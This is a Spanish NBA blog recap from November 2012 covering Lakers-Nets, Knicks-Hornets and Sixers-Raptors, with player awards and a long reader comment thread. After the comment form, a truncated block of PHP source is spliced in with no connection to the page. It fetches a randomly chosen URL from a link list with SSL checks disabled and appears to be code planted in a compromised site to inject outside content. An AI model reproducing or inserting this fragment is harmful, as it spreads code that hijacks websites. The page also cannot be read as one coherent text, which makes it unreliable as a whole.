La Crónica: Paso firme

21 de November de 2012 por Viva_Dirk

Noche de pocos partidos. Solo 3 duelos que nos dejan a 3 equipos que parecen no perder el paso: unos como los Lakers lo están cogiendo, otros como los Knicks lo llevan desde principio de curso y finalmente los Sixers lo aguantan pese a los obstáculos que encuentran.

En el Staples hubo duelo de gallos. Visitaban LA los nuevos Nets y los aficionados locales presenciaron una gran versión de sus piezas principales. Howard, pese a un lamentable 7 de 19 en tiros libres, se fue hasta los 23 puntos, 15 rebotes y 4 tapones; Kobe y Pau completaron soberbias actuaciones como catalizadores del juego angelino en ausencia de Nash, y MWP, al cual hay que aprovechar cuando coge una racha de anotación ( ya llegarán los 3 de 15 en tiros) ayer se fue a los 17 puntos y 8 rebotes. Los problemas serios aparecen por el momento en el banco y la línea de 3. Por los Nets, Deron Williams y Brook Lopez vendieron cara su piel pese a que el segundo mucho más efectivo que el primero. El resto podríamos decir que cumplió su función pero sin brillantez alguna. 

Los Knicks dieron buena cuenta de unos Hornets sin Davis ni Gordon. Un gran acierto desde la línea de 3 y el dominar claramente los tableros fue suficiente para los de la “gran manzana” que tuvieron en Carmelo a su mejor hombre pero donde casi ninguna pieza falla. Si fuera aficionado de NY estaría mosqueado con la vuelta de Stat. En ausencia de sus referentes, los Hornets fueron liderados por Ryan Anderson. Austin Rivers cuajó una actuación correcta pero Aminu estuvo horrible.

En Philadelphia duelo de bases: Jrue Holiday rozó el triple-doble con 19 puntos, 8 rebotes y 12 asistencias y Calderon nos dejó 13 puntos, 5 rebotes y 12 asistencias. La victoria se quedaba en casa gracias a un último cuarto demoledor de los Sixers. Pese a que Evan Turner sigue sin despegar, Philadelphia es un bloque difícil de batir. En los Raptors, DeRozan sigue con un gran acierto anotador, Bargnani tuvo el día bueno y Valanciunas aprovechó la ausencia de juego interior con un 11-11, pero respecto a la mayoría de equipos los falta consistencia y talento.

PREMIOS

MVP: Entre los 23 puntos, 15 rebotes y 4 tapones de Dwight Howard, los 29 puntos, 6 rebotes y 4 asistencias de Carmelo Anthony y los 19 puntos, 8 rebotes y 12 asistencias de Jrue Holiday nos quedamos con la actuación del base de los Sixers.

Rookie: En ausencia de A.Davis vimos 14 puntos y 4 asistencias de Austin Rivers. Premio, sin emrbago, para Jonas Valanciunas y sus 11 puntos, 11 rebotes, 3 asistencias y 3 tapones.

Sorpresa: Si el rendimiento de Metta World Peace fuese parecido al de ayer durante toda la temporada los Lakers serían prácticamente imbatibles. 17 puntos y 8 rebotes con una buena serie de tiro.

Decepción: Borrón en la buena temporada que esta cuajando Al-Farouq Aminu. En 24 minutos no anotó ningún punto y apenas lanzó a canasta.

Esfuerzo en vano: Premio para Jose Calderon que con 13 puntos, 5 rebotes y 12 asistencias no llegó a la victoria. El otro candidato es Deron Williams que con 22 puntos, 4 rebotes y 10 asistencias fue el mejor de los suyos.

Imágenes | AP Photos / Getty Images

Comenta

22 comentarios a esta entrada

  1. elreylagarto dice:
    #1

    Como digo en la pregunta de a quién de los hermanos preferís…hoy Pau ha estado a 3 asistencias del triple doble, siendo el líder de asistencias del equipo. Lo dicho…es capaz de hacer de todo y bien. Y para eso…Master Card.

    Un saludo.
    Lagarto.

      Citar

  2. Lanegan dice:
    #2

    Como anécdota, en los últimos segundos del partido de Nets-Lakers, cuando Kobe se disponía a tirar el libre decisivo G. Wallace, intentando provocarle, lo retó a lanzar con los ojos cerrados, a lo MJ. Por lo visto Bryant le contesto que si, pero apostando pasta (How much you want to put on this?, 500?) y Wallace se rajó. KB finalmente lanzó casi entre risas y encestó, mientras seguía dialogando con el bueno de Gerald.

      Citar

  3. txusma dice:
    #3

    Lanegan:
    Como anécdota, en los últimos segundos del partido de Nets-Lakers, cuando Kobe se disponía a tirar el libre decisivo G. Wallace, intentando provocarle, lo retó a lanzar con los ojos cerrados, a lo MJ. Por lo visto Bryant le contesto que si, pero apostando pasta (How much you want to put on this?, 500?) y Wallace se rajó. KB finalmente lanzó casi entre risas y encestó, mientras seguía dialogando con el bueno de Gerald.
    http://www.youtube.com/watch?v=JKdrvvYU1R0

    Gracias por el vídeo. Lo colgamos tb en twitter.

      Citar

  4. Denise dice:
    #4

    Si los Raptors quieren sacar algo por Calderón, éste es el momento exacto para traspasarlo.

    Los Lakers cada vez están mejor, aunque me sorprende el mal rendimiento de Jamison y Meeks. Tras el despido de Brown, no he visto ningun partido de L.A. no sé si el pesimo rendimiento de ambos es debido a que están mal fisica o mentalmente, o que no se buscan tiros cómodos para ellos. Si quieren hacer algo, para mí es esencial darle a estos 2 mas minutos y oportunidades.

      Citar

  5. Vader dice:
    #5

    ¿La vuelta de Stat?

    Cobra casi 20 kilos, así que hay que buscarle rendimiento porque a menos que vuelva en plan estelar su traspaso es imposible. Saliendo desde el banco o jugando más cerca del aro pero estos Knicks podran ser candidatos al anillo si Stat demuestra que puede sumar sin restar a lo que ya tenemos.

    Personalmente tengo muchas ganas de ver que pasa. Melo ya esta “relajado”, siendo el lider indiscutible y en sus números. Tenemos un buen entrenador, tenemos 3 buenos bases que mueven el equipo y tenemos gente por dentro que hace trabajo sucio… Lo tenemos todo para que Stat pueda entrar y funcionar bien. No para hacer 25ppp, pero con 15-20ppp cerca del aro estos Knicks darian miedo…

    Lo dicho, muchas ganas de que vuelva!!

      Citar

  6. GreenPride dice:
    #6

    Anoche vi el Lakers-Nets. Los Lakers empiezan a coger el hilo. Es cierto que tienen muchos problemas con el banco (Jamison y Meeks deben ser los gemelos malos de los que contrataron). Tampoco ayudó el 7/19 de Howard desde el tiro libre y que Deron Williams se riera de Morris durante el segundo cuarto pero finalmente sacaron el partido adelante. Un pero en el final del partido donde volvieron durante 4 o 5 jugadas consecutivas al Kobe-sistema con resultado de 3 tiros forzadísimos fallados por Kobe y una canasta super difícil en un gancho sobre Lopez. Sin duda, una de las cosas a cambiar en los Lakers que parece que van cogiendo la forma. Ayer muy bien Pau y Artest.
    Por los Nets bien Williams, Lopez y Wallace muy intenso ayudando en los rebotes y la defensa. Sin embargo sus tiradores Brooks y sobre todo Jhonson no dieron una. Una vez más partido para tirar de JoJo que está haciendo una temporada nefasta. O le recuperan o sus opciones como candidatos bajarán muchos puntos. Llevaron el partido a 84-78 a favor a falta de poco más de 4 minutos y ahí se hundieron, les falta todavía acople y saber como jugar esas últimas posesiones.

      Citar

  7. Pop dice:
    #7

    Ojo a Kobe, que está teniendo la mejor eficacia de tiro de su carrera. Tanto que le hemos dado cera con su selección (y anoche forzó un par de veces), está este año liderando la anotación con 26,3 PPP y nada menos que casi un 53%, cuando siempre se ha movido en un 45%.

      Citar

  8. Esteban dice:
    #8

    abra q ver como rewacciona la defensa de los knicks con stat, pero lo cierto es que por momento NY se ve falto de gol, si no es carmelo, felton o j.r. smith, y NADIE mas, algun lob para chandler o algun tirple abierto de novak o kidd

    frente a menphis les falto otra carta de goil y amare puede ser la llave

    lo que no se esta hablando mucho, es de amere como centro en determinados minutos de algunos jegos, carmelo de 4 y amare de 5, para ampliar rotaciones, asi podrian jugar muchos minutos ambos

    evidentemente woodson le gusta innovar

      Citar

  9. Blade Petrovic dice:
    #9

    Que grande calde.¿seguira jugando cuando vuelva lowry?

      Citar

  10. Ruxixón dice:
    #10

    Yo lo que no entendi de los Nets es porqué en los dos últimos minutos no han usado el “Hack a Dwight”,total,ya te pusiste a llevarlo a la línea de personal hazlo en lo momentos clave y no esperes a que el balón llegué a Kobe que se sabe que las posibilidades de que sume mínimo 2 puntos son más elevadas.

      Citar

  11. Sancho88 dice:
    #11

    No vi el partido de ayer Blade, pero sí vi el resumen y si no me equivoco, en algunos momentos Casey puso a Calde-Lowry-LaZorra. Podría ser un backourt de gran calidad y acierto. En el puesto de alero no hay nada demasiado interesante, y está claro que estos tres son los mejores jugadores en esas posiciones. Además, ya va siendo hora de que mi amigo Derousan empiece de verdad a defender y a pelear contra aleros (SF). No se puede ser toda la vida un SG cuando no eres shooting guard ni de coña. O evoluciona o yo no me lo creo.

    Calderón-Lowry-DeRozan-Bargnani-Valanciunas podría ser equipo de playoffs, con tipos como Lucas, Ross, Davis, Amir Johnson y Kleiza de suplentes. De hecho, no sé cómo llevan ese parcial tan malo. Por nombres y por la pinta que tienen deberían ganar muchos más partidos

      Citar

  12. melo15 dice:
    #12

    Sancho, ese quinteto no es el que Toronto necesita, y menos si aspira a hacer algo en PO, Calderon es un base que no defiende nada, de lo peor en la NBA en ese sentido y Lowry es demasiado pequeño para jugar de SG.
    Los Knicks por ejemplo si que estan jugando mucho con Felton-Kidd pero por

      Citar

  13. melo15 dice:
    #13

    melo15:
    Sancho, ese quinteto no es el que Toronto necesita, y menos si aspira a hacer algo en PO, Calderon es un base que no defiende nada, de lo peor en la NBA en ese sentido y Lowry es demasiado pequeño para jugar de SG.
    Los Knicks por ejemplo si que estan jugando mucho con Felton-Kidd pero por

    perdon de me ha cortado.
    Decia que los Knicks estan jugando con estos dos porque Kidd mide 1,91 y puede defender relativamente a escoltas pero ni Calderon puede defender a bases ni Lowry a escoltas.

      Citar

  14. Denise dice:
    #14

    Calderón-Lowry-DeRozan-Bargnani-Valanciunas podría ser equipo de playoffs, con tipos como Lucas, Ross, Davis, Amir Johnson y Kleiza de suplentes. De hecho, no sé cómo llevan ese parcial tan malo. Por nombres y por la pinta que tienen deberían ganar muchos más partidos

    Sancho, en mi opinión creo que sobrevaloras a los Raptors. Para mi son un equipo de medio pelo que no deberíani ni oler Playoffs.

    Del 5 titular solo me gusta Lowry y no creo que pueda mantener el nivel que tuvo en los Rockets el año pasado, Calderón es solo un base correcto, nada más, no te gana partidos él solo; De Rozan tu sabes mas que nadie como es, un día se viste de crack y en los 5 partidos siguientes se casca un 6 de 18 por noche. Bargnani solo tira de 3 y deberia diversificar su juego, el día que no le entran los tiros, es un estorbo en la cancha porque ni defiende, rebotea, ni hace nada más; Valanciunas es un rookie y hay que tener paciencia con él.

    Después tenemos en el banco a Fields, que es un buen jugador de equipo, me gusta dentro de su rol; Ed Davis que confío en su progresión, y Kleiza que no está mal como cuarto alero para un equipo, Pero despues hay morralla infumable como Amir Johnson, nunca entenderé que le ven a este nefasto jugador con el contrato que tiene, McGuire, Alan Anderson, Aaron Gray, bffff mucho que reconstruir y mucho trabajo tiene el GM.

    Con la actual base, y salvo que Valanciunas se transforme en un Mr 20-10 por noche, no creo que consigan entrar en PO en los proximos años. Si quieren hacer algo, deberían de hacer este año tanking a lo bestia, y en verano intentar fichar a algun buen agente libre aunque tengan que sobrepagarle para que se quiera ir a la no atractiva ciudad de Toronto.

      Citar

  15. melo15 dice:
    #15

    Denise: Sancho, en mi opinión creo que sobrevaloras a los Raptors. Para mi son un equipo de medio pelo que no deberíani ni oler Playoffs.

    Del 5 titular solo me gusta Lowry y no creo que pueda mantener el nivel que tuvo en los Rockets el año pasado, Calderón es solo un base correcto, nada más, no te gana partidos él solo; De Rozan tu sabes mas que nadie como es, un día se viste de crack y en los 5 partidos siguientes se casca un 6 de 18 por noche. Bargnani solo tira de 3 y deberia diversificar su juego, el día que no le entran los tiros, es un estorbo en la cancha porque ni defiende, rebotea, ni hace nada más; Valanciunas es un rookie y hay que tener paciencia con él.

    Después tenemos en el banco a Fields, que es un buen jugador de equipo, me gusta dentro de su rol;Ed Davis que confío en su progresión, y Kleiza que no está mal como cuarto alero para un equipo, Pero despues hay morralla infumable como Amir Johnson, nunca entenderé que le vena este nefasto jugador con el contrato que tiene, McGuire, Alan Anderson, Aaron Gray, bffffmucho que reconstruir y mucho trabajo tiene el GM.

    Con la actual base, y salvo que Valanciunas se transforme en un Mr 20-10 por noche, no creo que consigan entrar en PO en los proximos años. Si quieren hacer algo, deberían de hacer este año tanking a lo bestia, y en verano intentar fichar a algun buen agente libre aunque tengan que sobrepagarle para que se quiera ir a la no atractiva ciudad de Toronto.

    Denise, creo que te has pasado seis pueblos con estos Raptors, Lowry tiene nivel all-star y si no mira coma ha empezado la temporada, DeRozan solía ser inconsistente pero desde que ha empezado la temporada esta en 19pp con buenos porcentajes, y con un tiro de 3 muy mejorado, no sera un jugador franquicia pero como segunda espada no esta mal. Bargnani me esta decepcionando bastante , como dices no le estan entrando los tiros y tampoco hace mucho mas…pero como tercer espada esta mas que bien.
    Despues tenemos a Fields, Calderon y Amir Johnson que todos pese a su contrato aportan su cosas, y ademas estan Ed Davis que ha frenado mucho su progresion y Terrence Ross que ha empezado dubitativo pero cuando vaya ganando minutos y confianza empezara a ser importante. Y para acabar Valanciunnas, otro bastante irregular, algunas noches te hace un 16-11 y otras un 9-5 pero creo que ira ganando importancia.
    Como he dicho muchas veces lo tienen dificl pero pelearan con Hawks, Bucks por la octava.
    PD: No se si te has revisado el calendario de los Raptors hasta ahora, casi todos sus partidos han sido contar equipos de PO y sin Lowry los han luchado hasta el final.

      Citar

  16. Sancho88 dice:
    #16

    Terrence Ross tiene pinta de superjugón. Lo digo mucho antes de que se casque un partidazo, cosa que aún no ha hecho. En serio, creo que lo tiene todo por lo poco que le he visto. Igual que Terrence Jones

      Citar

  17. lost dice:
    #17

    A mi que vuelva STAT no me preocupa, me encanta! A los Knicks lo que les falta es un 4 anotador, ya que está bien que Melo se vaya a los 27ppp pero necesitas a un escudero en el juego interior, y Amare es un jugador que te puede hacer unos 19ppp/8rpp, yo con eso estoy contento.
    Se dice que Carmelo y Amare no pueden convivir, pero yo creo que si pueden. Nunca han tenido a un base que pueda beneficiar a los 2: Billups (llegó tocado y rascándoselos), Toney Douglas(no hace falta decir nada más), Jeremy Lin(un jugador que necesita mucho el balón y no destaca por ser un gran playmaker) y Mike Bibby(…). Ahora los Knicks tienen a tres bases que para mí benefician a los 2: Felton y Amare conectaron muy bien hace dos años, nunca había visto jugar tan bien a Stoudemire, Kidd que beneficia a Carmelo por la inteligencia que transmite en todos los aspectos y Prigioni, dios del pick&roll. Si logran repartirse la ofensiva con las ayudas de Felton, JR Smith, Novak y Rasheed, y bajan el culo en defensa, este equipo es candidato a las finales de conferencia mínimo. Pero lo repito, todo esto si logran conectar en ataque y defienden(principalmente Amare, que Melo ya lo está haciendo).
    PD: Hoy me veo el NY@Dallas, espero una victoria. La gestión que hizo Woodson en el último partido fue muy buena, Melo jugo unos 27 minutos y creo que nadie pasó de los 30. A ver si hoy se gana en Dallas pero en un btb creo que será muy difícil.

      Citar

  18. MagicJohnson32 dice:
    #18

    Sorpresa: Kevin Love vuelve esta noche y será titular.

      Citar

  19. Cocinitas dice:
    #19

    Si Kevin Love is back. Y no creo q Ricky tarde mucho, que ganas de ver a estos timberwolves, lastima las bajas de Roy y Budinger.

      Citar

  20. Pop dice:
    #20

    Sí que ha vuelto sí. 18 puntos-7reb lleva a falta de 2′ para el halftime.

      Citar

  21. Denise dice:
    #21

    Que ha pasado en el Kings – Lakers de anoche? Viendo el box-score, parece como si hubiesen puesto minas antipersonas en la pintura y nadie se atreviese a entrar; Pau y Howard 15 puntos y 14 tiros entre ellos (1 triple incluido) y DeMarcus Cousins solo 9 tiros y 7 puntos.

      Citar

  22. txusma dice:
    #22

    Denise:
    Que ha pasado en el Kings – Lakers de anoche? Viendo el box-score, parece como si hubiesen puesto minas antipersonas en la pintura y nadie se atreviese a entrar; Pau y Howard 15 puntos y 14 tiros entre ellos (1 triple incluido) y DeMarcus Cousins solo 9 tiros y 7 puntos.

    Ya tenemos crónica! Lo de Cousins han sido problemas de faltas.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>